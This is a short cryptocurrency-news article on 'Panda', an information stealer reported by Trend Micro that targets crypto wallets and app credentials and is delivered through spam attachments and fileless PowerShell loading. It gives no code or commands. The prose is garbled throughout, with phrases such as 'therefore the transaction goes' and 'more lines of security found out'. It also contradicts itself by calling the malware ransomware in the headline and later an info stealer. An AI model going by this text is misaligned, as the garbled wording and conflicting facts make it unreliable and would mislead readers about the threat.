Cryptocurrency News

New Ransomware ‘Panda’ Affecting Crypto Wallets – ALERT.

A new ransomware attack now goes after cryptocurrency wallets, alongside account credentials from other apps like NordVPN, Telegram, Discord, and Steam.

Referred as “Panda,” the new information-stealing malware [also referred info stealer for short] was discovered by Trend Micro, a renowned cybersecurity firm.

“Cryptocurrency wallets are now as big of a target for online theft as banking accounts are,” outlined the Trend Micro researchers who discovered the attack. “With more people stepping into cryptocurrencies and therefore the values of said crypto assets still increasing, this may only become a greater threat moving forward.”

They also revealed that there’s more risk here as unlike theft via a bank or a credit card, there might not be a central authority that will undo malicious transactions. Once you lose your money and therefore the transaction goes on the blockchain, it’s likely gone forever.

At a high level, consistent with the researchers, the attack begins with spam messages that consist a malicious attachment. This attachment uses PowerShell scripts, task automation, and configuration management coding language Microsoft, to download the particular Panda Stealer malware [in encoded form], which are then loaded filelessly onto the affected system.

“None of this is often particularly novel in and of itself – malicious Office documents are documented, so is fileless loading,” added the researchers. “The main “new” aspect here is that the target of the info theft.”

Beyond just targeting crypto wallets with malware, attackers now are setting their sights on apps like Discord and Telegram – popular communications platforms for cryptocurrency communities.

The attack campaign, which was active earlier in April, uses spam emails and therefore the same rare fileless distribution method as a separate recent attack. Morphisec, another cybersecurity firm, discovered a Phobos ransomware campaign earlier in April that uses a uniform fileless distribution method to Panda, making it harder for security tools to identify.

“The fileless distribution utilized in this case means there’s no signature for antivirus software to detect the threat, and it can bypass detection,” outlined Michael Gorelik, CTO, and head of threat intelligence at Morphisec. “Moreover, it’s dangerous for both users’ wallets and even enterprises, with more lines of security found out.”

Leave a Comment

Your email address will not be published. Required fields are marked *